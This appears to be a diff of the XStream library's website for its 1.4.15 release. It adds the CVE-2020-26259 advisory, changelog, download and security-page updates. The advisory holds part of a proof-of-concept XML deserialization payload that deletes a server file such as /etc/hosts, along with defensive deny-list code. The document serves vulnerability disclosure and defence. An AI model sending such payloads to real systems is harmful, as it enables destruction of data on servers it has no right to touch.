41 | <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'> | |
42 | <dataHandler> | |
43 | <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'> | |
44 | <contentType>text/plain</contentType> | |
45 | <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'> | |
46 | <tempFile>/etc/hosts</tempFile> | |
47 | </is> | |
48 | </dataSource> | |
49 | <transferFlavors/> | |
50 | </dataHandler> | |
51 | <dataLen>0</dataLen> | |
52 | </value> | |
53 | </jdk.nashorn.internal.objects.NativeString> | |
54 | <string>test</string> | |
55 | </entry> | |
56 | </map> | |
57 | </pre></div> | |
58 | <div class="Source Java"><pre>XStream xstream = new XStream(); | |
59 | xstream.fromXML(xml); | |
60 | </pre></div> | |
61 | ||
62 | <p>As soon as the XML gets unmarshalled, the payload gets executed and the references file is deleted.</p> | |
63 | ||
64 | <p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p> | |
65 | ||
66 | <h2 id="impact">Impact</h2> | |
67 | ||
68 | <p>The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing | |
69 | process has sufficient rights only by manipulating the processed input stream.</p> | |
70 | ||
71 | <h2 id="workaround">Workaround</h2> | |
72 | <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p> | |
73 | <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can | |
74 | simply add two lines to XStream's setup code:</p> | |
75 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" }); | |
76 | xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" }); | |
77 | </pre></div> | |
78 | <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream's setup | |
79 | code:</p> | |
80 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" }); | |
81 | xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class }); | |
82 | xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" }); | |
83 | </pre></div> | |
84 | <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from | |
85 | scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>, | |
86 | <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>jdk.nashorn.internal.objects.NativeString</em>, | |
87 | <em>java.lang.Void</em> and <em>void</em> and deny several types by name pattern.</p> | |
88 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" }); | |
89 | xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class }); | |
90 | xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" }); | |
91 | </pre></div> | |
92 | <p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently | |
93 | know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:</p> | |
94 | <div class="Source Java"><pre>xstream.registerConverter(new Converter() { | |
95 | public boolean canConvert(Class type) { | |
96 | return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class | |
97 | || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString") | |
98 | || type == java.lang.Void.class || void.class || Proxy.isProxy(type) | |
99 | || type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream")); | |
100 | } | |
101 | ||
102 | public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) { | |
103 | throw new ConversionException("Unsupported type due to security reasons."); | |
104 | } | |
105 | ||
106 | public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) { | |
107 | throw new ConversionException("Unsupported type due to security reasons."); | |
108 | } | |
109 | }, XStream.PRIORITY_LOW); | |
110 | </pre></div> | |
111 | ||
112 | <h2 id="credits">Credits</h2> | |
113 | ||
114 | <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p> | |
115 | ||
116 | </body> | |
117 | </html>⏎ |
33 | 33 | <p>Not yet released.</p> |
34 | 34 | --> |
35 | 35 | |
36 | <h1 id="1.4.15">1.4.15</h1> | |
37 | ||
38 | <p>Released December 13, 2020.</p> | |
39 | ||
40 | <p class="highlight">This maintenance release addresses the security vulnerabilities | |
41 | <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when | |
42 | unmarshalling for XStream instances with uninitialized security framework.</p> | |
43 | ||
44 | <h2>Minor changes</h2> | |
45 | ||
46 | <ul> | |
47 | <li>GHI:#226: XmlFriendlyNameCoder does not accept '9' as valid character in an XML name.</li> | |
48 | <li>GHPR:#228: DefaultMapper should handle IllegalArgumentException thrown by Class.forName().</li> | |
49 | </ul> | |
50 | ||
51 | <h2>Stream compatibility</h2> | |
52 | ||
53 | <ul> | |
54 | <li>The type jdk.nashorn.internal.objects.NativeString and the internal JAX-WS type ReadAllStream.FileStream | |
55 | are now part of the default blacklist and the deserialization of XML containing one of the two types will fail. | |
56 | You will have to enable these types by explicit configuration, if you need them.</li> | |
57 | </ul> | |
58 | ||
59 | <h2>Delivery</h2> | |
60 | ||
61 | <p>Any XStream release can run with a minimal Java runtime environment of Java 1.4 as long as this environment will | |
62 | process only requested classes of the jar file. Until version 1.4.14 XStream was delivered also as special Java 7 | |
63 | version for Android, because Dalvik scans all classes and fails at classes requiring a higher runtime version. However, this | |
64 | special version will not work in a normal Java 8 environment or higher and was never meant do so.</p> | |
65 | ||
66 | <p>Unfortunately, this version has to be build always after the standard version due to the build sequence. The | |
67 | latest version in Maven Central however is always the one that has been deployed last independently from the time | |
68 | of publishing. This creates an annoyance now in GitHub for any project using the Dependabot service which creates | |
69 | automated pull requests with updates to the latest XStream version, because it injects now the special Java 7 | |
70 | version that probably breaks these projects.</p> | |
71 | ||
72 | <p>Users who still require a special version for Java 7 will have to build this artifact now on their own. Users | |
73 | for even older Java environments had always to do so anyway.</p> | |
74 | ||
36 | 75 | <h1 id="1.4.14">1.4.14</h1> |
37 | 76 | |
38 | 77 | <p>Released November 16, 2020.</p> |
45 | 84 | |
46 | 85 | <ul> |
47 | 86 | <li>The types java.lang.ProcessBuilder and javax.imageio.ImageIO$ContainsFilter are now part of the default |
48 | blacklist and the deserialization of XML containing one of the two types will fail. You will must enable these | |
49 | types by explicit configuration, if you need them.</li> | |
87 | blacklist and the deserialization of XML containing one of the two types will fail. You will have to enable | |
88 | these types by explicit configuration, if you need them.</li> | |
50 | 89 | </ul> |
51 | 90 | |
52 | 91 | <h1 id="1.4.13">1.4.13</h1> |
17 | 17 | |
18 | 18 | <p><a href="versioning.html">About XStream version numbers...</a></p> |
19 | 19 | |
20 | <h1 id="stable">Stable Version: <span class="version">1.4.14</span></h1> | |
20 | <h1 id="stable">Stable Version: <span class="version">1.4.15</span></h1> | |
21 | 21 | |
22 | 22 | <ul> |
23 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.14/xstream-distribution-1.4.14-bin.zip">Binary distribution:</a></b> | |
23 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-bin.zip">Binary distribution:</a></b> | |
24 | 24 | Contains the XStream jar files, the Hibernate and Benchmark modules and all the dependencies.</li> |
25 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.14/xstream-distribution-1.4.14-src.zip">Source distribution:</a></b> | |
25 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-src.zip">Source distribution:</a></b> | |
26 | 26 | Contains the complete XStream project as if checked out from the Subversion version tag.</li> |
27 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.14/xstream-1.4.14.jar">XStream Core only:</a> | |
27 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.15/xstream-1.4.15.jar">XStream Core only:</a> | |
28 | 28 | The xstream.jar only as it is downloaded automatically when it is referenced as Maven dependency.</b></li> |
29 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.14/xstream-hibernate-1.4.14.jar">XStream Hibernate module:</a></b> | |
29 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.15/xstream-hibernate-1.4.15.jar">XStream Hibernate module:</a></b> | |
30 | 30 | The xstream-hibernate.jar as it is downloaded automatically when it is referenced as Maven dependency.</li> |
31 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.14/xstream-jmh-1.4.14-app.zip">XStream JMH module:</a></b> | |
31 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.15/xstream-jmh-1.4.15-app.zip">XStream JMH module:</a></b> | |
32 | 32 | The xstream-jmh-app.zip as standalone application with start scripts and all required libraries.</li> |
33 | <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.14-java7/xstream-1.4.14-java7.jar">XStream Core for Java 7 only:</a> | |
34 | The xstream.jar only <a href="faq.html#Compatibility_Android">without the Java 8 stuff</a> as it is downloaded automatically when it is referenced as Maven dependency.</b></li> | |
35 | 33 | </ul> |
36 | 34 | |
37 | 35 | <h1 id="maven">Maven Central Repository</h1> |
42 | 40 | <div class="Source XML"><pre><dependency> |
43 | 41 | <groupId>com.thoughtworks.xstream</groupId> |
44 | 42 | <artifactId>xstream</artifactId> |
45 | <version>1.4.14</version> | |
43 | <version>1.4.15</version> | |
46 | 44 | </dependency></pre></div> |
47 | 45 | |
48 | 46 | <h1 id="previous-releases">Previous Releases</h1> |
72 | 72 | |
73 | 73 | <h1 id="news">Latest News</h1> |
74 | 74 | |
75 | <h2 id="1.4.14"><b>November 16, 2020</b> XStream 1.4.14 released</h2> | |
75 | <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2> | |
76 | 76 | |
77 | <p class="highlight">This maintenance release addresses the security vulnerability | |
78 | <a href="CVE-2020-26217.html">CVE-2020-26217</a>, reported originally as CVE-2017-9805 for Struts' XStream | |
79 | Plugin, an arbitrary execution of commands when unmarshalling for XStream instances with uninitialized security | |
80 | framework.</p> | |
77 | <p class="highlight">This maintenance release addresses the security vulnerabilities | |
78 | <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when | |
79 | unmarshalling for XStream instances with uninitialized security framework.</p> | |
81 | 80 | |
82 | <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p> | |
81 | <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p> | |
83 | 82 | |
84 | <p>Note, the next major release 1.5 will require Java 8.</p> | |
83 | <p>Note, the next major release 1.5 will require Java 8.</p> | |
85 | 84 | |
86 | 85 | </body> |
87 | 86 | </html> |
14 | 14 | </head> |
15 | 15 | |
16 | 16 | <body> |
17 | ||
18 | <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2> | |
19 | ||
20 | <p class="highlight">This maintenance release addresses the security vulnerabilities | |
21 | <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when | |
22 | unmarshalling for XStream instances with uninitialized security framework.</p> | |
23 | ||
24 | <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p> | |
25 | ||
26 | <p>Note, the next major release 1.5 will require Java 8.</p> | |
17 | 27 | |
18 | 28 | <h2 id="1.4.14"><b>November 16, 2020</b> XStream 1.4.14 released</h2> |
19 | 29 |
28 | 28 | |
29 | 29 | <p>The provided XML data is used by XStream to unmarshal Java objects. This data can be manipulated by injecting |
30 | 30 | the XML representation of other objects, that were not present at marshalling time. An attacker could take |
31 | advantage of this to execute arbitrary code or shell commands in the context of the server running the XStream | |
32 | process. A concrete case is described in <a href="CVE-2013-7285.html">CVE-2013-7285</a> and | |
33 | <a href="CVE-2020-26217.html">CVE-2020-26217</a>.</p> | |
34 | ||
35 | <p>Note that the XML data can be manipulated on different levels. For example, manipulating values on existing | |
36 | objects (such as a price value), or breaking the format and causing the XML parser to fail. The latter case will | |
37 | raise an exception, but the former case must be handled by validity checks in any application which processes | |
38 | user-supplied XML. A worst case scenario is the injection of arbitrary code or shell commands, as noted above. | |
31 | advantage of this to access private data, delete local files, execute arbitrary code or shell commands in the | |
32 | context of the server running the XStream process. Concrete cases are described in | |
33 | <a href="CVE-2013-7285.html">CVE-2013-7285</a>, <a href="CVE-2020-26217.html">CVE-2020-26217</a>, | |
34 | <a href="CVE-2020-26258.html">CVE-2020-26258</a>, and <a href="CVE-2020-26259.html">CVE-2020-26259</a>.</p> | |
35 | ||
36 | <p>Note, that the XML data can be manipulated on different levels. For example, manipulating values on existing | |
37 | objects (such as a price value), accessing private data, or breaking the format and causing the XML parser to fail. | |
38 | The latter case will raise an exception, but the former case must be handled by validity checks in any application | |
39 | which processes user-supplied XML. A worst case scenario is the injection of arbitrary code or shell commands, as noted above. | |
39 | 40 | Even worse, <a href="CVE-2017-7957.html">CVE-2017-7957</a> describes a case to crash the Java Virtual Machine |
40 | 41 | causing a Denial of Service.</p> |
41 | 42 | |
63 | 64 | |
64 | 65 | <p>More scenarios have been identified for types that are already delivered with the Java runtime. Looking at |
65 | 66 | well-known and commonly used Java libraries libraries such as ASM, CGLIB, or Groovy, the possibility for more |
66 | exploits is very high.</p> | |
67 | ||
68 | <p class="hightlight">Therefore creates a black list for special classes only a scenario for a false security, | |
69 | because no-one can assure, that no other scenario arise. A better approach is a whitelist i.e. the allowed class | |
70 | types are setup explicitly. This will be the default for XStream 1.5.x.</p> | |
67 | exploits is very high. A class like InvokerTransformer of Apache Commons Collections has a high potential for | |
68 | attacks.</p> | |
69 | ||
70 | <p class="hightlight">A blacklist for special classes only creates therefore a scenario for a false security, | |
71 | because no-one can assure, that no other scenario arise. A better approach is the usage of a whitelist i.e. the | |
72 | allowed class types are setup explicitly. This will be the default for XStream 1.5.x (see below).</p> | |
71 | 73 | |
72 | 74 | <p>Starting with XStream 1.4.7, an instance of the EventHandler is no longer handled by default. You have to |
73 | 75 | explicitly register a ReflectionConverter for the EventHandler type, if your application has the requirement to |
90 | 92 | framework supports the setup of a blacklist or whitelist scenario. Any application should use this feature to |
91 | 93 | limit the danger of arbitrary command execution if it deserializes data from an external source.</p> |
92 | 94 | |
93 | <p>XStream itself sets up a black list by default, i.e. it blocks all currently known critical classes of the Java | |
94 | runtime. Main reason for the black list is compatibility, because otherwise newer versions of XStream 1.4.x can no | |
95 | <p>XStream itself sets up a blacklist by default, i.e. it blocks all currently known critical classes of the Java | |
96 | runtime. Main reason for the blacklist is compatibility, because otherwise newer versions of XStream 1.4.x can no | |
95 | 97 | longer be used as drop-in replacement. Unfortunately this provides a false sense of security. Every XStream |
96 | 98 | client should therefore switch to a whitelist on its own as soon as possible. XStream itself will use a whitelist |
97 | 99 | as default starting with 1.5.x and only clients that have also changed their setup will be able to use this newer |
120 | 122 | <p>Noted above, it might be possible that other combinations are found with the Java runtime itself, or other |
121 | 123 | commonly-used Java libraries that allow a similar vulnerability like the known case using the Java Beans |
122 | 124 | EventHandler. To prevent such a possibility at all, XStream version 1.4.7 and above contains a security framework, |
123 | allowing application developers to define which types are allowed to be unmarshalled with XStream.</p> | |
125 | allowing application developers to define which types are allowed to be unmarshalled with XStream. Use | |
126 | <a href="javadoc/com/thoughtworks/xstream/XStream.html#setupDefaultSecurity-com.thoughtworks.xstream.XStream-">XStream.setupDefaultSecurity()</a> | |
127 | to install the default whitelist of 1.5.x already with 1.4.10 or higher.</p></p> | |
124 | 128 | |
125 | 129 | <p>The core interface is <a href="javadoc/com/thoughtworks/xstream/security/TypePermission.html">TypePermission</a>. |
126 | 130 | The <a href="javadoc/com/thoughtworks/xstream/mapper/SecurityMapper.html">SecurityMapper</a> will evaluate a list |
0 | 0 | <!-- |
1 | 1 | Copyright (C) 2005, 2006 Joe Walnes. |
2 | Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016 XStream committers. | |
2 | Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016, 2017, 2020 XStream committers. | |
3 | 3 | All rights reserved. |
4 | 4 | |
5 | 5 | The software in this package is published under the terms of the BSD |
44 | 44 | </section> |
45 | 45 | <section> |
46 | 46 | <name>Vulnerabilities</name> |
47 | <page>CVE-2020-26259.html</page> | |
48 | <page>CVE-2020-26258.html</page> | |
47 | 49 | <page>CVE-2020-26217.html</page> |
48 | 50 | <page>CVE-2017-7957.html</page> |
49 | 51 | <page>CVE-2016-3674.html</page> |